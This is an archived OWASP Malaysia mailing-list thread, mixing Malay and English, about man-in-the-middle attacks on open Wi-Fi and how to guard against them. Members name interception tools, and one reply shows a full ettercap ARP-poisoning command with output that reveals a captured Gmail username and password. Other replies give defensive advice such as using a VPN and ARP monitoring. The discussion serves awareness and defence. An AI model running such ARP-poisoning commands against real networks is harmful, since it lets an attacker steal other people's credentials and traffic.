[Owasp-Malaysia] Man In The Middle Attack Wireless

Faizul faizul at mysecurity.my
Fri Sep 24 13:34:48 EDT 2010


kalau nak selamat sekurangnya ada jugak la antivirus, internet security dan
lain-lain.
sekurang-kurangnya mencabar sikit kalau sapa nak hack ke nak apa ke.
ini kosong je, bogel sapa tak stim. kalau askar nak gi perang bogel tak
pakai baju pun paling ciput ada rifle dengan peluru jugak.
guna broadband sendiri pun orang boleh tengok jgk, tp kena ada device yang
canggih baru boleh, spisis gsm interceptor dan lain-lain.
ada terbaca pasal GSM hacking ? A5/1 ? USRP ? openbts ? benda tu pun ramai
jugak berminat. kat indonesia ramai dah try main-main dgn benda ni.


On Sat, Sep 25, 2010 at 12:18 AM, Amir Haris <amirharis at gmail.com> wrote:

> This paper is quite old, but it helps us to understand on how to detect
> sniffer.
>
> www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf
>
>
>
> On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran <mfazliazran at gmail.com>wrote:
>
>> Hebat Guru Faizul nie buat live hack.. . memandangkan open network memang
>> bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai yang
>> memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar akan
>> kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh pengguna yang
>> rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka tak
>> tau.
>>
>> Tapi please consider use VPN kalau nak masuk ke open network nie.. maybe
>> akan banyak membantu anda untuk protect laptop anda dari di sniffer yang
>> senantiasa membaca packet anda...
>>
>> Pastikan anda delete semua cookie yang ada dalam browser anda sebelum
>> connect ke wifi tersebut. Pastikan yer!!
>>
>> Kalau untuk pengguna window tegar boleh try guna Hotspot Shield<http://anchorfree.com/downloads/hotspot-shield/>ini. banyak kebaikannya... amin!!! dah ada untuk iphone la .. boleh download
>> untuk peminat2 iphone. :)
>>
>> Pastikan laptop anda tidak ada buat public file sharing.. pastikan tau!!!
>>
>> Last jangan connect terlampau lama dengan open network ni lagi lama anda
>> connect lagi banyak information hackers2 ni dapat. Pastikan anda tidak leka
>> dan lalai yer!!!
>>
>> Sebenarnya banyak lagi software yang boleh digunakan untuk protect laptop
>> anda jika anda banyak explore dan menyelidik sedikit sebanyak tentang cara
>> nak protect laptop anda especially untuk pengguna windows.. tapi jangan
>> sangka pulak pengguna OS lain boleh terlepas... huhuhu.
>>  P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch, Arpsnmp atau
>> DecaffeinatID anda mesti menyukainya.. :P
>> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <faizul at mysecurity.my> wrote:
>>
>>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah target
>>> dan 254 adalah gateway
>>>
>>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau
>>> dragon
>>>
>>> Listening on eth0... (Ethernet)
>>>
>>>   eth0 ->       00:0C:29:97:59:E4          10.1.1.1     255.255.255.0
>>>
>>> Privileges dropped to UID 0 GID 0...
>>>
>>>   28 plugins
>>>   39 protocol dissectors
>>>   53 ports monitored
>>> 7587 mac vendor fingerprint
>>> 1698 tcp OS fingerprint
>>> 2183 known services
>>>
>>> Scanning for merged targets (2 hosts)...
>>>
>>> * |==================================================>| 100.00 %
>>>
>>> 2 hosts added to the hosts list...
>>>
>>> ARP poisoning victims:
>>>
>>>  GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92
>>>
>>>  GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6
>>> Starting Unified sniffing...
>>>
>>>
>>> Text only Interface activated...
>>> Hit 'h' for inline help
>>>
>>> HTTP : 74.125.127.99:443 -> USER: 9w2pju  PASS: selamathariraya  INFO:
>>> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3
>>>
>>>
>>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <amirharis at gmail.com> wrote:
>>>
>>>> Haris,
>>>>
>>>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar...
>>>>
>>>>
>>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <hazrul at hazrulnz.net>wrote:
>>>>
>>>>>  Based on the blog post, plenty of tools can be used to perform such
>>>>> attacks. Nowadays tools are getting more "user friendly" and yeah since
>>>>> he's using insecure Wifi facility -visible network packets/traffics -
>>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with
>>>>> ferret and hamster is much more easier. But based on the symptoms or
>>>>> the
>>>>> screenshots, it is more monkey in the middle attack compared to
>>>>> sidejacking (I prefer this one).
>>>>>
>>>>> So, never access your private accounts using insecure or open ap
>>>>> wireless environment. Guna la broadband.. :D
>>>>>
>>>>> p/s: besides I believe nobody actually read/understand/concern on the
>>>>> warning popups regarding the cert validity. Usually we just click "Add
>>>>> exception" and "proceed" :D
>>>>>
>>>>> That's my 2 halala
>>>>>
>>>>> Thanks
>>>>>
>>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote:
>>>>> > There is https/ssl mitm in the cain & abel using fake private/public
>>>>> key. It intercepts the ssl handshake and providing the fake key (if the key
>>>>> is not trusted) to the client. In my previous test, my friend realized a
>>>>> fake ssl for maybank site when I'm running the attack, and he told me
>>>>> maybank has been hacked (but not). For wireless (not ethernet) layer 2,
>>>>> there is utility like airpwn and karma for this kind of attack. I haven't
>>>>> read yet the blog but to answer first the question. Wallahualam.
>>>>> > Sent from my BlackBerry® smartphone
>>>>> >
>>>>> > -----Original Message-----
>>>>> > From: Harisfazillah Jamel <linuxmalaysia at gmail.com>
>>>>> > Sender: owasp-malaysia-bounces at lists.owasp.org
>>>>> > Date: Fri, 24 Sep 2010 19:21:31
>>>>> > To: owasp-malaysia<owasp-malaysia at lists.owasp.org>
>>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless
>>>>> >
>>>>> > Tittle should be man in the minddle attack..
>>>>> >
>>>>> > ettercap can be used to capture packet. But its hard to get our
>>>>> > password in HTTPS protocol. I believe a kind of proxy is used for
>>>>> > this.
>>>>> >
>>>>> > Any idea what kind of proxy?
>>>>> >
>>>>> >
>>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote:
>>>>> >> ARP poisoning can be used.ettercap
>>>>> >>
>>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" <
>>>>> linuxmalaysia at gmail.com> wrote:
>>>>> >>> Assalamualaikum and salam sejahtera,
>>>>> >>>
>>>>> >>> Would like to share this blog post.
>>>>> >>>
>>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/
>>>>> >>>
>>>>> >>> How man in the middle attack can be used in this case?
>>>>> >>>
>>>>> >>> Thanks.
>>>>> > _______________________________________________
>>>>> > Owasp-Malaysia mailing list
>>>>> > Owasp-Malaysia at lists.owasp.org
>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >
>>>>> > OWASP Malaysia Wiki
>>>>> > http://www.owasp.org/index.php/Malaysia
>>>>> >
>>>>> > OWASP Malaysia Wiki Facebook
>>>>> >
>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> > _______________________________________________
>>>>> > Owasp-Malaysia mailing list
>>>>> > Owasp-Malaysia at lists.owasp.org
>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >
>>>>> > OWASP Malaysia Wiki
>>>>> > http://www.owasp.org/index.php/Malaysia
>>>>> >
>>>>> > OWASP Malaysia Wiki Facebook
>>>>> >
>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >
>>>>>
>>>>> _______________________________________________
>>>>> Owasp-Malaysia mailing list
>>>>> Owasp-Malaysia at lists.owasp.org
>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>
>>>>> OWASP Malaysia Wiki
>>>>> http://www.owasp.org/index.php/Malaysia
>>>>>
>>>>> OWASP Malaysia Wiki Facebook
>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> Owasp-Malaysia mailing list
>>>> Owasp-Malaysia at lists.owasp.org
>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>
>>>> OWASP Malaysia Wiki
>>>> http://www.owasp.org/index.php/Malaysia
>>>>
>>>> OWASP Malaysia Wiki Facebook
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>
>>>
>>>
>>>
>>> --
>>> 73 de 9W2PJU
>>>
>>> http://9w2pju.blogspot.com
>>>
>>>
>>> _______________________________________________
>>> Owasp-Malaysia mailing list
>>> Owasp-Malaysia at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>
>>> OWASP Malaysia Wiki
>>> http://www.owasp.org/index.php/Malaysia
>>>
>>> OWASP Malaysia Wiki Facebook
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>
>> Mohd Fazli Azran
>> Pengguna Internet Tegar
>>
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>



-- 
73 de 9W2PJU

http://9w2pju.blogspot.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20100925/4e9cfd1a/attachment-0001.html 


More information about the Owasp-Malaysia mailing list